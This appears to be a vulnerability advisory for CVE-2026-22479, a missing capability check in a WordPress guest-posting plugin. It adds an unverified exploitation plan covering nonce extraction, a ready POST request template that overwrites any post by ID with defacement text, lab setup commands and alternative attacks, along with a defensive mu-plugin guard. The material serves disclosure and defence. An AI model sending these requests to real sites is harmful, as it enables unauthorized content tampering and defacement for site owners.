CVE-2026-22479

Easy Post Submission – Frontend Posting, Guest Publishing & Submit Content for WordPress <= 2.4.0 - Missing Authorization

Severity: medium
Type: Missing Authorization
CVSS Score: 5.3
Patched in: 2.5.0
Time to patch: 43d

Description

The Easy Post Submission – Frontend Posting, Guest Publishing & Submit Content for WordPress plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.4.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: None
  • Integrity: Low
  • Availability: None

Technical Details

  • Affected versions: <=2.4.0
  • Published: March 4, 2026
  • Last updated: April 15, 2026
  • Affected plugin: easy-post-submission

What Changed in the Fix

Changes introduced in v2.5.0

Source Code: WordPress.org SVN

Research Plan (Unverified)

Detailed Exploitation Research Plan: CVE-2026-22479

1. Vulnerability Summary

The Easy Post Submission plugin (versions <= 2.4.0) contains a missing authorization vulnerability within its frontend AJAX handling logic. Specifically, the create_post function (associated with the rbsm_submit_post AJAX action) is accessible to unauthenticated users (wp_ajax_nopriv_rbsm_submit_post) to allow guest submissions. However, the function fails to properly validate that a user has permission to modify a post when a postId parameter is provided. This allows an unauthenticated attacker to overwrite the content, title, and metadata of any existing WordPress post by providing its ID.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: rbsm_submit_post
  • HTTP Method: POST
  • Authentication: None (Unauthenticated)
  • Vulnerable Parameter: postId (used to target an existing post for modification)
  • Preconditions:
    1. The plugin must be active.
    2. A valid nonce for the easy-post-submission action must be obtained.
    3. A "Submission Form" must exist (the plugin creates a default one during its "Quick Start" setup).

3. Code Flow

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with action=rbsm_submit_post.
  2. Hook Registration: In includes/client-ajax-handler.php, the constructor registers:
    add_action( 'wp_ajax_nopriv_rbsm_submit_post', [ $this, 'create_post' ] );
    
  3. Data Sanitization: create_post calls $this->get_sanitized_submission_data().
  4. Nonce Check: Inside get_sanitized_submission_data():
    • It retrieves $_POST['_nonce'].
    • It verifies it against self::$nonce (which is 'easy-post-submission').
    • It extracts postId from $_POST['postId'].
  5. Vulnerable Sink: create_post uses the extracted postId to perform a wp_insert_post() or wp_update_post() operation. In version 2.4.0 and below, it fails to call current_user_can('edit_post', $postId) or verify that the guest user is the original author of the post being modified.
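
A temporary guard for sites that cannot move to 2.5.0 immediately, as an added example (not the plugin's code and not its 2.5.0 fix): a must-use plugin that applies the capability check named in step 5 before the plugin's handler runs. The function name eps_guard_check_post_id and the placement as a file under wp-content/mu-plugins/ are assumptions of this example, and the hook and parameter names are taken from the unverified research plan above.

```php
<?php
/**
 * Plugin Name: Easy Post Submission postId guard (added example)
 * Description: Temporary mitigation for CVE-2026-22479 until 2.5.0 is installed.
 */

defined( 'ABSPATH' ) || exit;

/**
 * Runs before the plugin's own handler and stops any submission that names
 * an existing post the caller is not allowed to edit.
 */
function eps_guard_check_post_id() {
	// 'postId' is the parameter name given in the write-up above.
	$raw = isset( $_POST['postId'] ) ? wp_unslash( $_POST['postId'] ) : '';

	// Absent or empty: a new submission, which the plugin may accept from guests.
	if ( '' === $raw ) {
		return;
	}

	// Arrays and other non-scalar input fail closed as post ID 0.
	$post_id = is_scalar( $raw ) ? absint( $raw ) : 0;

	// The check the write-up reports as missing. Guests hold no capabilities,
	// so every unauthenticated request that carries a postId stops here.
	if ( $post_id > 0 && current_user_can( 'edit_post', $post_id ) ) {
		return;
	}

	// Leave a trace for triage; the remote address is logged as seen by PHP.
	error_log( sprintf(
		'eps-guard: blocked rbsm_submit_post postId=%d user=%d ip=%s',
		$post_id,
		get_current_user_id(),
		isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : '-'
	) );

	// wp_send_json_error() ends the request, so the handler at priority 10 never runs.
	wp_send_json_error( array( 'message' => 'You are not allowed to edit this post.' ), 403 );
}

// Priority 0 runs ahead of the plugin's default-priority callback.
add_action( 'wp_ajax_nopriv_rbsm_submit_post', 'eps_guard_check_post_id', 0 );
// Assumption: the same action may also be registered for logged-in users.
add_action( 'wp_ajax_rbsm_submit_post', 'eps_guard_check_post_id', 0 );
```

The guard fails closed on any non-empty postId, so a form that legitimately sends a placeholder value there would be blocked until the plugin is updated. Remove the file once 2.5.0 or later is installed.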

4. Nonce Acquisition Strategy

The plugin generates the nonce for the easy-post-submission action and localizes it for use in frontend forms.

  1. Shortcode Identification: The plugin uses the shortcode [rb_submission_form] to display the submission form.
  2. Setup: Create a public page containing this shortcode.
  3. Navigation: Navigate to the page using browser_navigate.
  4. Extraction: Use browser_eval to extract the nonce from the localized JavaScript object. The plugin typically localizes its parameters into the rbsm_params or rbsm_ajax_params object.
    • Target Variable: window.rbsm_params.nonce or window.rbSubmission.nonce.
    • Fallback: If the variable name is unknown, search the page source for the string "easy-post-submission".

5. Exploitation Strategy

  1. Discover Form ID: The plugin requires a formId (referencing the rb_submission table). A default form is usually created during setup with ID 1.
  2. Identify Target: Select a target Post ID (e.g., Post ID 1, usually the default "Hello world!" post).
  3. Craft Payload:
    • action: rbsm_submit_post
    • _nonce: [EXTRACTED_NONCE]
    • postId: [TARGET_POST_ID]
    • title: Hacked by CVE-2026-22479
    • content: Your site has been modified due to missing authorization.
    • formId: 1
  4. Execute: Send the request using the http_request tool.

Request Template:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=rbsm_submit_post&_nonce=[NONCE]&postId=1&title=Defaced&content=Vulnerable+Plugin&formId=1

6. Test Data Setup

  1. Install Plugin: Ensure easy-post-submission version 2.4.0 is installed.
  2. Trigger Setup: The plugin requires a "Setup Flag" to be set or the activation routine to run to create the rb_submission table.
    • wp eval "Easy_Post_Submission::get_instance()->activate_site();"
  3. Create Submission Form:
    • wp db query "INSERT INTO wp_rb_submission (title, data) VALUES ('Default Form', '{}');"
  4. Create Exploit Page:
    • wp post create --post_type=page --post_status=publish --post_title="Submit" --post_content='[rb_submission_form]'
  5. Target Post: Ensure a post with ID 1 exists.

7. Expected Results

  • The AJAX request should return a JSON success response: {"success":true,"data":...}.
  • The post with the specified postId (e.g., ID 1) should have its title and content updated to the values provided in the exploit payload.

8. Verification Steps

  1. Check Post Content: Use WP-CLI to verify the post was modified.
    • wp post get 1 --field=post_title
    • wp post get 1 --field=post_content
  2. Check Status: Ensure the modification occurred even though the request was unauthenticated.

9. Alternative Approaches

  • Status Manipulation: If the plugin allows setting post_status, attempt to change a private or draft post to publish.
  • Form ID Enumeration: If form ID 1 does not exist, use a loop or SQL query to find a valid ID from the wp_rb_submission table.
  • Custom Fields: If the post uses metadata, attempt to inject data via the customFieldsData parameter identified in get_sanitized_submission_data().
